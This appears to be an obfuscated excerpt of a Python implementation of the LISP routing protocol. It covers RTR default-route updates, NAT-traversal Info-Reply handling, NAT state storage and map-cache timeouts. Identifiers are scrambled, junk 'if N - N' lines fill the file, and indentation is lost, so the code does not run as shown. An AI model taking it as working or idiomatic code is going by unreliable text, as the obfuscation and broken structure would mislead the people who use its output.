if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
def lisp_update_default_routes ( map_resolver , iid , rtr_list ) :
iiiiIii = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 37 - 37: IiII
O0o0oo0oo0oo0 = { }
for oOo00O in rtr_list :
if ( oOo00O == None ) : continue
IiiIIi1 = rtr_list [ oOo00O ]
if ( iiiiIii and IiiIIi1 . is_private_address ( ) ) : continue
O0o0oo0oo0oo0 [ oOo00O ] = IiiIIi1
if 30 - 30: OoO0O00 / I1IiiI / OOooOOo % IiII * I1ii11iIi11i / i1IIi
rtr_list = O0o0oo0oo0oo0
if 49 - 49: I1ii11iIi11i * IiII / I1IiiI . I11i
iI1i = [ ]
for O000oOOoOOO in [ LISP_AFI_IPV4 , LISP_AFI_IPV6 , LISP_AFI_MAC ] :
if ( O000oOOoOOO == LISP_AFI_MAC and lisp_l2_overlay == False ) : break
if 29 - 29: iIii1I11I1II1 % Oo0Ooo
if 29 - 29: i11iIiiIii . o0oOOo0O0Ooo + Oo0Ooo + I1IiiI - I1ii11iIi11i
if 10 - 10: I1ii11iIi11i - i1IIi * OoOoOO00 / II111iiii * I1IiiI - IiII
if 56 - 56: Ii1I - iIii1I11I1II1
if 76 - 76: IiII . iII111i % iII111i . OoooooooOO . IiII
O000O0o00o0o = lisp_address ( O000oOOoOOO , "" , 0 , iid )
O000O0o00o0o . make_default_route ( O000O0o00o0o )
IiiiiII1i = lisp_map_cache . lookup_cache ( O000O0o00o0o , True )
if ( IiiiiII1i ) :
if ( IiiiiII1i . checkpoint_entry ) :
lprint ( "Updating checkpoint entry for {}" . format ( green ( IiiiiII1i . print_eid_tuple ( ) , False ) ) )
if 77 - 77: I1Ii111
elif ( IiiiiII1i . do_rloc_sets_match ( rtr_list . values ( ) ) ) :
continue
if 77 - 77: OoO0O00 * O0 + OoOoOO00 % O0 * Ii1I . OOooOOo
IiiiiII1i . delete_cache ( )
if 52 - 52: O0 / I1Ii111 + o0oOOo0O0Ooo . O0 . OoO0O00
if 81 - 81: o0oOOo0O0Ooo - OoOoOO00 - Oo0Ooo * i11iIiiIii - Ii1I
iI1i . append ( [ O000O0o00o0o , "" ] )
if 88 - 88: O0 * OoO0O00 * ooOoO0o / iII111i . oO0o
if 96 - 96: IiII . I1Ii111 % ooOoO0o
if 39 - 39: II111iiii - OoO0O00 % I1Ii111 + IiII - i11iIiiIii
if 31 - 31: OoOoOO00 + Oo0Ooo / OoO0O00 - OOooOOo
O0o00oOOOO00 = lisp_address ( O000oOOoOOO , "" , 0 , iid )
O0o00oOOOO00 . make_default_multicast_route ( O0o00oOOOO00 )
oOOoo0o = lisp_map_cache . lookup_cache ( O0o00oOOOO00 , True )
if ( oOOoo0o ) : oOOoo0o = oOOoo0o . source_cache . lookup_cache ( O000O0o00o0o , True )
if ( oOOoo0o ) : oOOoo0o . delete_cache ( )
if 62 - 62: ooOoO0o . I1IiiI * i11iIiiIii
iI1i . append ( [ O000O0o00o0o , O0o00oOOOO00 ] )
if 2 - 2: i11iIiiIii
if ( len ( iI1i ) == 0 ) : return
if 86 - 86: I1Ii111 + o0oOOo0O0Ooo
if 17 - 17: iIii1I11I1II1
if 32 - 32: IiII - OoOoOO00
if 88 - 88: OOooOOo - II111iiii + i1IIi * Oo0Ooo
ooo0oo = [ ]
for ooOoOo0O in rtr_list :
I11111I = rtr_list [ ooOoOo0O ]
iIII = lisp_rloc ( )
iIII . rloc . copy_address ( I11111I )
iIII . priority = 254
iIII . mpriority = 255
iIII . rloc_name = "RTR"
ooo0oo . append ( iIII )
if 82 - 82: I1ii11iIi11i % OoO0O00 . I11i * I1ii11iIi11i - OoO0O00 / Oo0Ooo
if 4 - 4: OoOoOO00 * iIii1I11I1II1
for O000O0o00o0o in iI1i :
IiiiiII1i = lisp_mapping ( O000O0o00o0o [ 0 ] , O000O0o00o0o [ 1 ] , ooo0oo )
IiiiiII1i . mapping_source = map_resolver
IiiiiII1i . map_cache_ttl = LISP_MR_TTL * 60
IiiiiII1i . add_cache ( )
lprint ( "Add {} to map-cache with RTR RLOC-set: {}" . format ( green ( IiiiiII1i . print_eid_tuple ( ) , False ) , rtr_list . keys ( ) ) )
if 18 - 18: IiII / I1Ii111 % i1IIi * i11iIiiIii
ooo0oo = copy . deepcopy ( ooo0oo )
if 16 - 16: Oo0Ooo
return
if 24 - 24: o0oOOo0O0Ooo . OoOoOO00
if 50 - 50: I1ii11iIi11i / iIii1I11I1II1 - Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o
if 92 - 92: OoooooooOO - I1ii11iIi11i . I11i / O0 % iII111i
if 96 - 96: I1IiiI . oO0o % O0
if 19 - 19: iIii1I11I1II1 + I1Ii111 / OoooooooOO % OOooOOo - i1IIi + I11i
if 87 - 87: OoooooooOO
if 97 - 97: ooOoO0o * IiII / iIii1I11I1II1
if 65 - 65: i1IIi - i11iIiiIii + oO0o % I1IiiI - OoO0O00 % ooOoO0o
if 23 - 23: o0oOOo0O0Ooo . o0oOOo0O0Ooo - iIii1I11I1II1 / o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + I1Ii111 . I1ii11iIi11i . OoOoOO00 % o0oOOo0O0Ooo * o0oOOo0O0Ooo
def lisp_process_info_reply ( source , packet , store ) :
if 2 - 2: oO0o % iII111i + I1ii11iIi11i / II111iiii * I1ii11iIi11i
if 45 - 45: II111iiii . iII111i
if 55 - 55: ooOoO0o / iII111i / O0
if 98 - 98: O0 % iII111i + II111iiii
OO0O0OOooo = lisp_info ( )
packet = OO0O0OOooo . decode ( packet )
if ( packet == None ) : return ( [ None , None , False ] )
if 13 - 13: I1IiiI * oO0o - o0oOOo0O0Ooo
OO0O0OOooo . print_info ( )
if 23 - 23: iIii1I11I1II1 + oO0o . oO0o / o0oOOo0O0Ooo
if 77 - 77: i1IIi * o0oOOo0O0Ooo * IiII
if 24 - 24: i11iIiiIii / iIii1I11I1II1 / iII111i
if 31 - 31: OOooOOo . iIii1I11I1II1 - oO0o
iiIiI11I11i11 = False
for ooOoOo0O in OO0O0OOooo . rtr_list :
oo0o00OO = ooOoOo0O . print_address_no_iid ( )
if ( lisp_rtr_list . has_key ( oo0o00OO ) ) :
if ( lisp_register_all_rtrs == False ) : continue
if ( lisp_rtr_list [ oo0o00OO ] != None ) : continue
if 16 - 16: I1Ii111 % i1IIi
iiIiI11I11i11 = True
lisp_rtr_list [ oo0o00OO ] = ooOoOo0O
if 50 - 50: OoOoOO00 / OoO0O00 * I11i / I11i / oO0o . Oo0Ooo
if 81 - 81: OOooOOo - OoooooooOO * iII111i / OOooOOo
if 98 - 98: I11i . OOooOOo - OoO0O00 % O0 * O0
if 91 - 91: I1IiiI % ooOoO0o * iII111i % OoOoOO00 . OoOoOO00 + OoOoOO00
if 95 - 95: o0oOOo0O0Ooo % i1IIi
if ( lisp_i_am_itr and iiIiI11I11i11 ) :
if ( lisp_iid_to_interface == { } ) :
lisp_update_default_routes ( source , lisp_default_iid , lisp_rtr_list )
else :
for o0OoO0000o in lisp_iid_to_interface . keys ( ) :
lisp_update_default_routes ( source , int ( o0OoO0000o ) , lisp_rtr_list )
if 14 - 14: iIii1I11I1II1 + iIii1I11I1II1
if 74 - 74: OoOoOO00 . iIii1I11I1II1 + Ii1I + ooOoO0o % OoOoOO00
if 37 - 37: i11iIiiIii + O0 + II111iiii
if 13 - 13: OOooOOo / O0
if 19 - 19: iIii1I11I1II1 + IiII * I11i * II111iiii + o0oOOo0O0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 . II111iiii
if 36 - 36: I1IiiI * i1IIi + OoOoOO00
if ( store == False ) :
return ( [ OO0O0OOooo . global_etr_rloc , OO0O0OOooo . etr_port , iiIiI11I11i11 ] )
if 63 - 63: OoOoOO00 - iII111i
if 83 - 83: i1IIi / iII111i % ooOoO0o % i11iIiiIii + I1ii11iIi11i
if 82 - 82: iIii1I11I1II1 / OOooOOo
if 7 - 7: OoooooooOO
if 71 - 71: OOooOOo * Oo0Ooo . Oo0Ooo % iIii1I11I1II1
if 56 - 56: IiII * iIii1I11I1II1 - iIii1I11I1II1 . O0
for Ooooo00 in lisp_db_list :
for iIII in Ooooo00 . rloc_set :
oOo00O = iIII . rloc
II1i = iIII . interface
if ( II1i == None ) :
if ( oOo00O . is_null ( ) ) : continue
if ( oOo00O . is_local ( ) == False ) : continue
if ( OO0O0OOooo . private_etr_rloc . is_null ( ) == False and
oOo00O . is_exact_match ( OO0O0OOooo . private_etr_rloc ) == False ) :
continue
if 56 - 56: I1Ii111 / iIii1I11I1II1 % IiII * iIii1I11I1II1 . I1ii11iIi11i . OOooOOo
elif ( OO0O0OOooo . private_etr_rloc . is_dist_name ( ) ) :
IiIi1I1i1iII = OO0O0OOooo . private_etr_rloc . address
if ( IiIi1I1i1iII != iIII . rloc_name ) : continue
if 1 - 1: Ii1I . Ii1I % II111iiii + I11i + OoOoOO00
if 52 - 52: OoooooooOO - OoO0O00
I11i11i1 = green ( Ooooo00 . eid . print_prefix ( ) , False )
o0O00oo0O = red ( oOo00O . print_address_no_iid ( ) , False )
if 24 - 24: iII111i / Oo0Ooo - I1ii11iIi11i + o0oOOo0O0Ooo
IIiIiIIiIIiI = OO0O0OOooo . global_etr_rloc . is_exact_match ( oOo00O )
if ( iIII . translated_port == 0 and IIiIiIIiIIiI ) :
lprint ( "No NAT for {} ({}), EID-prefix {}" . format ( o0O00oo0O ,
II1i , I11i11i1 ) )
continue
if 64 - 64: oO0o - i11iIiiIii
if 62 - 62: OoooooooOO - OoooooooOO / OoO0O00 - II111iiii . iIii1I11I1II1
if 2 - 2: O0 + o0oOOo0O0Ooo % OOooOOo . ooOoO0o % i1IIi
if 21 - 21: OoOoOO00 / OoooooooOO + I1Ii111 - IiII
if 62 - 62: Oo0Ooo % iII111i + OoooooooOO - I1ii11iIi11i % iII111i % iIii1I11I1II1
O0oO0o = OO0O0OOooo . global_etr_rloc
i1IIiI1111II1 = iIII . translated_rloc
if ( i1IIiI1111II1 . is_exact_match ( O0oO0o ) and
OO0O0OOooo . etr_port == iIII . translated_port ) : continue
if 82 - 82: I1IiiI . II111iiii % OoooooooOO
lprint ( "Store translation {}:{} for {} ({}), EID-prefix {}" . format ( red ( OO0O0OOooo . global_etr_rloc . print_address_no_iid ( ) , False ) ,
# oO0o * ooOoO0o . Oo0Ooo % OoOoOO00
OO0O0OOooo . etr_port , o0O00oo0O , II1i , I11i11i1 ) )
if 88 - 88: IiII . I11i * OoO0O00 % o0oOOo0O0Ooo - Ii1I
iIII . store_translated_rloc ( OO0O0OOooo . global_etr_rloc ,
OO0O0OOooo . etr_port )
if 6 - 6: I1IiiI / I1Ii111 % OoooooooOO * iIii1I11I1II1
if 47 - 47: OoooooooOO % II111iiii % OOooOOo
return ( [ OO0O0OOooo . global_etr_rloc , OO0O0OOooo . etr_port , iiIiI11I11i11 ] )
if 26 - 26: O0
if 23 - 23: oO0o
if 15 - 15: OoO0O00 . OoO0O00 * O0
if 97 - 97: OoooooooOO % ooOoO0o . I1Ii111 / iII111i
if 59 - 59: II111iiii + O0 . I1ii11iIi11i . Oo0Ooo * OoO0O00
if 35 - 35: oO0o / I1Ii111 * OOooOOo + OoooooooOO . IiII
if 1 - 1: I1IiiI + I1Ii111 / OOooOOo . Ii1I . oO0o / I1ii11iIi11i
if 54 - 54: OOooOOo
def lisp_test_mr ( lisp_sockets , port ) :
return
lprint ( "Test Map-Resolvers" )
if 86 - 86: oO0o * Oo0Ooo / OOooOOo
OOo0O0O0o0 = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
ii1i1Ii1 = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
if 7 - 7: I1Ii111 + ooOoO0o % o0oOOo0O0Ooo
if 53 - 53: i1IIi / iII111i % Ii1I % OoooooooOO
if 63 - 63: OOooOOo + I1ii11iIi11i . i1IIi . Ii1I - I1ii11iIi11i * o0oOOo0O0Ooo
if 79 - 79: ooOoO0o - O0
OOo0O0O0o0 . store_address ( "10.0.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , OOo0O0O0o0 , None )
OOo0O0O0o0 . store_address ( "192.168.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , OOo0O0O0o0 , None )
if 20 - 20: OOooOOo
if 22 - 22: iIii1I11I1II1 / I1Ii111
if 6 - 6: iII111i . i11iIiiIii / Oo0Ooo
if 86 - 86: I11i % I1Ii111 % oO0o - ooOoO0o / i1IIi
ii1i1Ii1 . store_address ( "0100::1" )
lisp_send_map_request ( lisp_sockets , port , None , ii1i1Ii1 , None )
ii1i1Ii1 . store_address ( "8000::1" )
lisp_send_map_request ( lisp_sockets , port , None , ii1i1Ii1 , None )
if 68 - 68: i1IIi % O0 % iII111i
if 55 - 55: I1ii11iIi11i % OOooOOo - o0oOOo0O0Ooo - II111iiii
if 52 - 52: I1Ii111
if 34 - 34: II111iiii + iII111i / IiII
iIIiIi = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
[ lisp_sockets , port ] )
iIIiIi . start ( )
return
if 84 - 84: ooOoO0o - o0oOOo0O0Ooo * iIii1I11I1II1 * iIii1I11I1II1
if 30 - 30: i1IIi + OoOoOO00 - I1ii11iIi11i % i1IIi
if 2 - 2: i11iIiiIii + i1IIi
if 1 - 1: i11iIiiIii + iIii1I11I1II1 / I11i * OoOoOO00 - OoOoOO00 % IiII
if 68 - 68: O0 . OoooooooOO
if 75 - 75: OoooooooOO * I1Ii111 * o0oOOo0O0Ooo + I1ii11iIi11i . iIii1I11I1II1 / O0
if 23 - 23: oO0o - O0 * IiII + i11iIiiIii * Ii1I
if 8 - 8: ooOoO0o / II111iiii . I1ii11iIi11i * ooOoO0o % oO0o
if 36 - 36: I1ii11iIi11i % OOooOOo - ooOoO0o - I11i + I1IiiI
if 37 - 37: I1ii11iIi11i * IiII
if 65 - 65: OOooOOo / O0 . I1ii11iIi11i % i1IIi % Oo0Ooo
if 36 - 36: i11iIiiIii - OOooOOo + iII111i + iII111i * I11i * oO0o
if 14 - 14: O0 - iII111i * I1Ii111 - I1IiiI + IiII
def lisp_update_local_rloc ( rloc ) :
if ( rloc . interface == None ) : return
if 46 - 46: OoooooooOO * OoO0O00 . I1Ii111
IiiIIi1 = lisp_get_interface_address ( rloc . interface )
if ( IiiIIi1 == None ) : return
if 95 - 95: ooOoO0o . I1ii11iIi11i . ooOoO0o / I1IiiI * OoOoOO00 . O0
oooOOoooo = rloc . rloc . print_address_no_iid ( )
oo0Oo0oo = IiiIIi1 . print_address_no_iid ( )
if 71 - 71: Ii1I * I1IiiI
if ( oooOOoooo == oo0Oo0oo ) : return
if 62 - 62: II111iiii / I1IiiI . I1ii11iIi11i
lprint ( "Local interface address changed on {} from {} to {}" . format ( rloc . interface , oooOOoooo , oo0Oo0oo ) )
if 49 - 49: IiII / OoOoOO00 / O0 * i11iIiiIii
if 47 - 47: i11iIiiIii + iII111i + i11iIiiIii
rloc . rloc . copy_address ( IiiIIi1 )
lisp_myrlocs [ 0 ] = IiiIIi1
return
if 66 - 66: o0oOOo0O0Ooo . I1IiiI + OoooooooOO . iII111i / OoooooooOO - IiII
if 47 - 47: o0oOOo0O0Ooo / II111iiii * i11iIiiIii * OoO0O00 . iIii1I11I1II1
if 34 - 34: I11i / o0oOOo0O0Ooo * OOooOOo * OOooOOo
if 89 - 89: I1ii11iIi11i . OoooooooOO
if 61 - 61: i1IIi + i11iIiiIii
if 59 - 59: i11iIiiIii * OOooOOo + i1IIi * iIii1I11I1II1 + I11i
if 97 - 97: OoO0O00 - I11i . OoooooooOO
if 58 - 58: I1ii11iIi11i / II111iiii / i11iIiiIii
def lisp_update_encap_port ( mc ) :
for oOo00O in mc . rloc_set :
O00OOoOOO0O0O = lisp_get_nat_info ( oOo00O . rloc , oOo00O . rloc_name )
if ( O00OOoOOO0O0O == None ) : continue
if ( oOo00O . translated_port == O00OOoOOO0O0O . port ) : continue
if 27 - 27: iIii1I11I1II1 - O0 + OoOoOO00
lprint ( ( "Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}" ) . format ( oOo00O . translated_port , O00OOoOOO0O0O . port ,
# i11iIiiIii * oO0o
red ( oOo00O . rloc . print_address_no_iid ( ) , False ) ,
green ( mc . print_eid_tuple ( ) , False ) ) )
if 100 - 100: iII111i % Oo0Ooo - OoO0O00 / OOooOOo % OoO0O00 - i11iIiiIii
oOo00O . store_translated_rloc ( oOo00O . rloc , O00OOoOOO0O0O . port )
if 18 - 18: I1ii11iIi11i
return
if 97 - 97: I11i * O0 + OoO0O00 / ooOoO0o
if 34 - 34: i11iIiiIii / o0oOOo0O0Ooo - OoooooooOO * O0 + i1IIi % I1IiiI
if 10 - 10: II111iiii - Ii1I . I11i . O0 + Ii1I
if 50 - 50: iIii1I11I1II1 / Ii1I . ooOoO0o / ooOoO0o * OoOoOO00 * iII111i
if 15 - 15: o0oOOo0O0Ooo % II111iiii + I1IiiI
if 21 - 21: I1ii11iIi11i - ooOoO0o
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
def lisp_timeout_map_cache_entry ( mc , delete_list ) :
if ( mc . map_cache_ttl == None ) :
lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 100 - 100: oO0o . OoO0O00 . i11iIiiIii % II111iiii * IiII
if 81 - 81: OOooOOo - OOooOOo + OoOoOO00
OoooOOoOo = lisp_get_timestamp ( )
if 19 - 19: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 + iIii1I11I1II1 % I1IiiI + ooOoO0o
if 86 - 86: o0oOOo0O0Ooo * i11iIiiIii - I11i
if 71 - 71: OoO0O00 - I11i
if 96 - 96: I1Ii111 / Ii1I
if 65 - 65: I1ii11iIi11i * O0 . IiII
if ( mc . last_refresh_time + mc . map_cache_ttl > OoooOOoOo ) :
if ( mc . action == LISP_NO_ACTION ) : lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 11 - 11: I11i / Ii1I % oO0o
if 50 - 50: i11iIiiIii
if 93 - 93: i1IIi / Ii1I * II111iiii - Oo0Ooo . OoOoOO00 - OOooOOo
if 25 - 25: I11i / ooOoO0o % ooOoO0o - OOooOOo
if 59 - 59: I1IiiI + o0oOOo0O0Ooo . iIii1I11I1II1 - O0 - i11iIiiIii
if ( lisp_nat_traversal and mc . eid . address == 0 and mc . eid . mask_len == 0 ) :
return ( [ True , delete_list ] )
if 4 - 4: I1IiiI
if 36 - 36: Ii1I
if 76 - 76: i11iIiiIii + i1IIi
if 56 - 56: OoOoOO00 + II111iiii / i11iIiiIii * OoOoOO00 * OoooooooOO
if 15 - 15: OoOoOO00 / OoooooooOO + OOooOOo
oO000o0Oo00 = lisp_print_elapsed ( mc . last_refresh_time )
Oo00O0o = mc . print_eid_tuple ( )
lprint ( "Map-cache entry for EID-prefix {} has {}, had uptime of {}" . format ( green ( Oo00O0o , False ) , bold ( "timed out" , False ) , oO000o0Oo00 ) )
if 76 - 76: Ii1I * iII111i . OoooooooOO
if 92 - 92: iIii1I11I1II1 - Oo0Ooo - I1IiiI - OOooOOo * I1Ii111
if 44 - 44: I1Ii111 - II111iiii / OOooOOo
if 50 - 50: I11i / I1ii11iIi11i
if 60 - 60: II111iiii / Ii1I + OoO0O00 % I1IiiI * i1IIi / II111iiii
delete_list . append ( mc )
return ( [ True , delete_list ] )
if 91 - 91: I1IiiI * I1Ii111 * i11iIiiIii - oO0o - IiII + I1ii11iIi11i
if 99 - 99: OoO0O00 % o0oOOo0O0Ooo
if 3 - 3: OOooOOo / OoOoOO00 % iIii1I11I1II1
if 47 - 47: ooOoO0o . i11iIiiIii / OoO0O00
if 48 - 48: O0
if 89 - 89: i11iIiiIii % OoO0O00 . OoOoOO00 + Oo0Ooo + OoOoOO00
if 53 - 53: Ii1I / OoOoOO00 % iII111i * OoooooooOO + Oo0Ooo
if 70 - 70: OoO0O00 % OoO0O00 * OoooooooOO
def lisp_timeout_map_cache_walk ( mc , parms ) :
O0ooo0oO00 = parms [ 0 ]
O0O0O00ooO0O0 = parms [ 1 ]
if 65 - 65: iII111i
if 75 - 75: iIii1I11I1II1 - Oo0Ooo + Ii1I + ooOoO0o
if 62 - 62: OOooOOo
if 13 - 13: OOooOOo . i11iIiiIii
if ( mc . group . is_null ( ) ) :
O00O00o0O0O , O0ooo0oO00 = lisp_timeout_map_cache_entry ( mc , O0ooo0oO00 )
if ( O0ooo0oO00 == [ ] or mc != O0ooo0oO00 [ - 1 ] ) :
O0O0O00ooO0O0 = lisp_write_checkpoint_entry ( O0O0O00ooO0O0 , mc )
if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
return ( [ O00O00o0O0O , parms ] )
if 79 - 79: oO0o
if 47 - 47: OoooooooOO - i1IIi * OOooOOo
if ( mc . source_cache == None ) : return ( [ True , parms ] )
if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
if 8 - 8: iII111i
if 10 - 10: OoOoOO00 % I11i
parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
return ( [ True , parms ] )
if 49 - 49: oO0o % ooOoO0o + II111iiii
if 21 - 21: i1IIi + OoO0O00 . I1IiiI - Oo0Ooo
if 99 - 99: OoOoOO00
if 46 - 46: I1ii11iIi11i / II111iiii / OoooooooOO / Ii1I
if 37 - 37: I1ii11iIi11i - Ii1I / oO0o . I1IiiI % I1Ii111
if 8 - 8: oO0o
if 46 - 46: I1Ii111 + IiII + II111iiii . o0oOOo0O0Ooo + i11iIiiIii
def lisp_timeout_map_cache ( lisp_map_cache ) :
I1I1i = [ [ ] , [ ] ]
I1I1i = lisp_map_cache . walk_cache ( lisp_timeout_map_cache_walk , I1I1i )
if 97 - 97: o0oOOo0O0Ooo % OoOoOO00 * O0 / iIii1I11I1II1 * OoO0O00 / i11iIiiIii
if 1 - 1: OoooooooOO . Ii1I
if 68 - 68: Ii1I
if 98 - 98: iII111i
if 33 - 33: OoO0O00 - ooOoO0o % O0 % iIii1I11I1II1 * iII111i - iII111i
O0ooo0oO00 = I1I1i [ 0 ]
for IiiiiII1i in O0ooo0oO00 : IiiiiII1i . delete_cache ( )
if 27 - 27: i11iIiiIii + I1ii11iIi11i + i1IIi
if 67 - 67: o0oOOo0O0Ooo
if 58 - 58: IiII % o0oOOo0O0Ooo + i1IIi
if 33 - 33: II111iiii
O0O0O00ooO0O0 = I1I1i [ 1 ]
lisp_checkpoint ( O0O0O00ooO0O0 )
return
if 61 - 61: I1Ii111
if 56 - 56: I1ii11iIi11i - OoooooooOO
if 52 - 52: Oo0Ooo - I11i - IiII - OoOoOO00
if 21 - 21: oO0o % o0oOOo0O0Ooo + I1Ii111 . OOooOOo / OOooOOo
if 41 - 41: Oo0Ooo . ooOoO0o * oO0o
if 31 - 31: Oo0Ooo * IiII / IiII
if 3 - 3: I1Ii111
if 65 - 65: iIii1I11I1II1 % Oo0Ooo % I11i / OoooooooOO
if 82 - 82: o0oOOo0O0Ooo
if 33 - 33: OoOoOO00 / i11iIiiIii - I1IiiI - OoooooooOO + i1IIi * I1Ii111
if 92 - 92: iII111i + OoO0O00
if 70 - 70: iIii1I11I1II1
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
if 14 - 14: I1Ii111 + Oo0Ooo
if 35 - 35: i11iIiiIii * Ii1I
def lisp_store_nat_info ( hostname , rloc , port ) :
oo0o00OO = rloc . print_address_no_iid ( )
oooooO0O0O = "{} NAT state for {}, RLOC {}, port {}" . format ( "{}" ,
blue ( hostname , False ) , red ( oo0o00OO , False ) , port )
if 62 - 62: I1ii11iIi11i * i1IIi - I1Ii111 * I11i . i1IIi - II111iiii
o00i11111I1Ii = lisp_nat_info ( oo0o00OO , hostname , port )
if 39 - 39: oO0o - O0
if ( lisp_nat_state_info . has_key ( hostname ) == False ) :
lisp_nat_state_info [ hostname ] = [ o00i11111I1Ii ]
lprint ( oooooO0O0O . format ( "Store initial" ) )
return ( True )
if 15 - 15: OoooooooOO . OoOoOO00 / iII111i - IiII % iII111i . ooOoO0o
if 78 - 78: OoOoOO00 / i1IIi
if 87 - 87: I1ii11iIi11i . O0 / I1ii11iIi11i
if 35 - 35: IiII % Oo0Ooo * Ii1I . IiII
if 16 - 16: I1ii11iIi11i % I1IiiI + Ii1I * I11i + i1IIi
if 14 - 14: iII111i / ooOoO0o % IiII - I1IiiI . Oo0Ooo
O00OOoOOO0O0O = lisp_nat_state_info [ hostname ] [ 0 ]
if ( O00OOoOOO0O0O . address == oo0o00OO and O00OOoOOO0O0O . port == port ) :
O00OOoOOO0O0O . uptime = lisp_get_timestamp ( )
lprint ( oooooO0O0O . format ( "Refresh existing" ) )
return ( False )
if 30 - 30: O0 . OOooOOo
if 23 - 23: i1IIi + OoooooooOO * OOooOOo . Oo0Ooo
if 83 - 83: OoooooooOO
if 53 - 53: o0oOOo0O0Ooo - Oo0Ooo / IiII + O0
if 88 - 88: Oo0Ooo % I1Ii111 * O0 - i1IIi * OoO0O00
if 74 - 74: Oo0Ooo % iIii1I11I1II1 + OOooOOo
if 50 - 50: OoO0O00 . OoooooooOO
iI1II11 = None
for O00OOoOOO0O0O in lisp_nat_state_info [ hostname ] :
if ( O00OOoOOO0O0O . address == oo0o00OO and O00OOoOOO0O0O . port == port ) :
iI1II11 = O00OOoOOO0O0O
break
if 65 - 65: I1ii11iIi11i + O0 + iII111i + II111iiii
if 100 - 100: I1Ii111
if 2 - 2: IiII - I1Ii111 . iIii1I11I1II1 - Ii1I * I11i
if ( iI1II11 == None ) :
lprint ( oooooO0O0O . format ( "Store new" ) )
else :
lisp_nat_state_info [ hostname ] . remove ( iI1II11 )
lprint ( oooooO0O0O . format ( "Use previous" ) )
if 58 - 58: i1IIi % iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo + ooOoO0o
if 23 - 23: Oo0Ooo % Oo0Ooo / IiII
O00OO00Oooo = lisp_nat_state_info [ hostname ]
lisp_nat_state_info [ hostname ] = [ o00i11111I1Ii ] + O00OO00Oooo
return ( True )
if 44 - 44: I11i . I1Ii111 . I1ii11iIi11i . oO0o
if 1 - 1: I11i % II111iiii / OoO0O00 + OoO0O00
if 46 - 46: Oo0Ooo * Ii1I / IiII % O0 * iII111i
if 74 - 74: OoooooooOO + Ii1I
if 100 - 100: I1IiiI
if 59 - 59: I1IiiI - OoOoOO00 * ooOoO0o / O0
if 54 - 54: Oo0Ooo % iIii1I11I1II1 * Oo0Ooo
if 80 - 80: I1ii11iIi11i - I1ii11iIi11i
def lisp_get_nat_info ( rloc , hostname ) :
if ( lisp_nat_state_info . has_key ( hostname ) == False ) : return ( None )
if 26 - 26: I1ii11iIi11i - I1IiiI * I1Ii111 % iIii1I11I1II1
oo0o00OO = rloc . print_address_no_iid ( )
for O00OOoOOO0O0O in lisp_nat_state_info [ hostname ] :
if ( O00OOoOOO0O0O . address == oo0o00OO ) : return ( O00OOoOOO0O0O )
if 77 - 77: o0oOOo0O0Ooo + I1Ii111 . OOooOOo . i1IIi . I1IiiI
return ( None )
if 100 - 100: ooOoO0o . i11iIiiIii + Ii1I - OOooOOo - i11iIiiIii - OoooooooOO
if 42 - 42: OoOoOO00 . I1IiiI / OoOoOO00 / I1ii11iIi11i . OoO0O00
if 67 - 67: Ii1I - O0 . OoooooooOO . I1Ii111 . o0oOOo0O0Ooo
if 73 - 73: I11i - oO0o . I1Ii111 + oO0o
if 48 - 48: IiII . IiII * o0oOOo0O0Ooo * II111iiii % ooOoO0o
if 40 - 40: I1ii11iIi11i
if 76 - 76: Oo0Ooo - I11i
if 82 - 82: OoO0O00 % oO0o . I11i / O0 - I1Ii111
if 39 - 39: I1IiiI
if 8 - 8: IiII * i1IIi * i1IIi * O0
if 69 - 69: Oo0Ooo
if 48 - 48: iII111i
if 11 - 11: i11iIiiIii * OoOoOO00 . OoO0O00
if 47 - 47: Oo0Ooo % I1Ii111 + ooOoO0o
if 89 - 89: iII111i
if 29 - 29: I1ii11iIi11i . ooOoO0o * II111iiii / iII111i . OoooooooOO - OoOoOO00
if 99 - 99: IiII % O0 - I1Ii111 * OoO0O00
if 77 - 77: OoooooooOO - I11i / I1IiiI % OoOoOO00 - OOooOOo
if 37 - 37: ooOoO0o
if 22 - 22: I1ii11iIi11i + II111iiii / OoooooooOO % o0oOOo0O0Ooo * OoOoOO00 . Oo0Ooo
def lisp_build_info_requests ( lisp_sockets , dest , port ) :
if ( lisp_nat_traversal == False ) : return
if 26 - 26: OoO0O00 % oO0o * Ii1I % OoooooooOO - oO0o
if 46 - 46: I1IiiI + OoO0O00 - O0 * O0
if 75 - 75: OOooOOo + iIii1I11I1II1 * OOooOOo
